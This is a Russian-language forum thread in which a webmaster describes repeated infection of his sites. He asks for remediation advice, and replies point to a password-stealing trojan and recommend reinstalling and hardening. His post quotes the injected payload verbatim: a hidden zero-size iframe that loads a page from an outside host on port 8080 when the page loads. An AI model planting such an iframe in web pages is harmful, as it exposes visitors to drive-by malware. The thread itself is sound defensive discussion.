Как защититься в такой ситуации

[loftiplamar]

Ситуация следующая: несколько дней назад вирусом были заражены все мои сайты (на нескольких хостингах). Код вируса записывался к конец файлов (в основном только файлов с названием index.*). Выглядел примерно следующим образом:

<iframe frameborder="0" onload="if (!this.src){ this.src='http://iq-mozgi.ru:8080/index.php'; this.height='0'; this.width='0';}" >vomfhwifyuxyvbppdqqmcsxjdloumov</iframe>

Аваст определяет HTML:Illiframe-D [Trj]. Сначала я почистил все файлы с такой строкой (и пододными строками, их было несколько вариантов) и все вроде как наладилось. На следующий день у меня снова все сайты были заражены. Тут я понял, что зря я хранил пароли введенными в total commander. Чтобы избавиться от вируса, я сначала поменял все пароли, удалил фтп соединения из тотала, снова почистил хост. Все опять наладилось, но уже на следующий день снова все сайты заражены. В чем же дело - я же уже не сохранял пароли? А может вирус прописался в пределах сайта, чтобы самовосстанавливаться?

ЧТо касается безопасности, то перед первым заражением у меня стояла бесплатная версия Avira (которая регулярно обновляется), затем в дополнение к Avira я поставил Avast, проверил им комп, он вроде как убил вирусы, но как видимо - не все. Система WinXP SP3 (обновления отключены)

Еще один момент - когда запускаю вебмани (и еще в некоторых случаях) сейчас (после установки аваста), Avira ругается на обнаружение вируса TR/Crypt.XPACK.Gen, но показывает, что он находится в файле C:\WINDOWS\Temp\_avast4_\unp174722536.tmp.

Итак, на данный момент я принял решение, что нужно переставить винду (перед этим отформатировав все диски), затем поставить нормальный антивирус и файервол и в дальнейшем не сохранять фтп пароли введенными. Что касается сайтов - то посносить их и восстановить записи из БД (у меня все в основном на вордпрессе).

От вас жду:
1. Советов по поводу правильности моего решения (и эффективности на будущее)
2. Советов, какие антивирь и файервол лучше установить, и вообще как граммотно восстановить безопасность в данном случае?

[pig]

Варианты:
1. У вас сидит троян, ворующий пароли от сайта. Тогда - Внимательно прочитать, аккуратно выполнить
2. Ломают хостера. Тогда менять хостера

Совет:
Из двух антивирусов оставьте на постоянном боевом дежурстве один, чтобы они не воевали друг с другом за файлы.

[Virtual]

loftiplamar, чет мне это напоминает
http://virusinfo.info/showthread.php...734#post500734

1. у вас уперли пароли
2. и не только
т.к. подобное поставленно на деньгооснову.
вас (ваш рабочий комп) взломали через одну из последних уязвимостей., и поставили так называемый, XPACK.Gen (там целая куча зла, обычно это
прокси - нужно же и от вашего имени гадить
кейлогер - ну пароли на все тож не помешают
разного рода кликеры и порносмотрелки
и и конечно-же сайтоправилки .)

так что:
1. ставить винду с нуля (ну или поуму лечится)
2. обновления лишними никогда небыли
3. мониторить уязвимости в внешнем софте (ну хоть тот же акробат, имхо через его уязвимость вас и того...)
4. не использовать обычный софт (тот же акробат или Ие)
5. конечно не хранить пароли сохраненными в софте (блокнот бумажный всегда надежней)
6. и самое главное НЕ СИДЕТЬ ПОД АДМИНОМ, в 90% помогает.

ЗЫ проверь и локальные копии сайтов, ибо и в них инжекты могут быть, особо если они не в архивах. да и на хостах посмотри внимательней, могли скрипты "отмычки" оставить.
ЗЫЗЫ если ты только что лез на голыетитьки.ком, то сразу не стоит ломится в свою админку сайта.